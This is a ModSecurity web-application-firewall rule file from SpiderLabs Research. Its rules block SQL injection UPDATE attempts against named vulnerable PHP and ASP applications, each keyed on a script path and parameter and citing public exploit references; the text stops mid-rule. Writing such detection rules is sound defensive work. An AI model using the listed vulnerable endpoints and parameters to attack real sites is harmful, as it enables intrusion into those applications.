SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004094,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4003'" SecRule &TX:'/SQL_INJECTION.*ARGS:form_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Phil-a-Form SQL Injection Attempt -- index.php form_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE SecRule REQUEST_LINE "@contains /philboard_forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004929,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3295'" SecRule &TX:'/SQL_INJECTION.*ARGS:forumid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Philboard SQL Injection Attempt -- philboard_forum.asp forumid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004910) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- pollmentorres.asp id UPDATE SecRule REQUEST_LINE "@contains /pollmentorres.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004910,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- 
pollmentorres.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3301'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PollMentor SQL Injection Attempt -- pollmentorres.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005626) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE SecRule REQUEST_LINE "@contains /simplog/archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005626,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:blogid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php blogid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005632) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid UPDATE SecRule REQUEST_LINE "@contains /simplog/archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005632,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- archive.php pid 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE SecRule REQUEST_LINE "@contains /simplog/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005638,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20974/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:blogid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Portix-PHP SQL Injection Attempt -- index.php blogid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE SecRule REQUEST_LINE "@contains /lire-avis.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006356,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21516'" SecRule &TX:'/SQL_INJECTION.*ARGS:aa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProNews SQL Injection Attempt -- lire-avis.php aa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010189) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /qte_result.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010189,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QUICKTEAM qte_result.php title Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE SecRule REQUEST_LINE "@contains /viewad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005686,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21197'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rapid Classified SQL Injection Attempt -- viewad.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005026,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005032,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:password/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- login.asp password UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id UPDATE SecRule REQUEST_LINE "@contains /user_confirm.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005098,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22350'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE SecRule REQUEST_LINE "@contains /user_confirm.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005104,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22350'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Raymond BERTHOU script SQL Injection Attempt -- user_confirm.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE SecRule REQUEST_LINE "@contains /recipe.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006944,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2834'" SecRule &TX:'/SQL_INJECTION.*ARGS:recipeid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- recipe.php recipeid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE SecRule REQUEST_LINE 
"@contains /list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006950,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2834'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recipes Complete Website SQL Injection Attempt -- list.php categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE SecRule REQUEST_LINE "@contains /edit_day.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003834,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3931'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_reserv/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ResManager SQL Injection Attempt -- edit_day.php id_reserv UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004605) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE SecRule REQUEST_LINE "@contains /inc/class_users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004605,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4020'" SecRule 
QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RevokeSoft RevokeBB SQL Injection Attempt -- class_users.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE SecRule REQUEST_LINE "@contains /listfull.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005692,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listfull.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005698) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE SecRule REQUEST_LINE "@contains /printmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005698,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- printmain.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE SecRule 
REQUEST_LINE "@contains /listmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005704,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- listmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005716) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE SecRule REQUEST_LINE "@contains /searchmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005716,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE SecRule REQUEST_LINE "@contains /searchkey.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005722,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:Keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp Keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE SecRule REQUEST_LINE "@contains /searchmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005728,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:area/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchmain.asp area UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005734) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005734,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:area/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp area UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE SecRule REQUEST_LINE "@contains /searchkey.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005741,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:searchin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchkey.asp searchin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost1 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005747,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cost1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005753,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:cost2/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp cost2 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE SecRule REQUEST_LINE "@contains /searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005759,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:acreage1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp acreage1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE SecRule REQUEST_LINE "@contains 
/searchoption.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005765,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21191'" SecRule &TX:'/SQL_INJECTION.*ARGS:squarefeet1/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rialto SQL Injection Attempt -- searchoption.asp squarefeet1 UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004665,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3403'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoria/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Rigter Portal System (RPS) SQL Injection Attempt -- index.php categoria UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /roleManager.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection 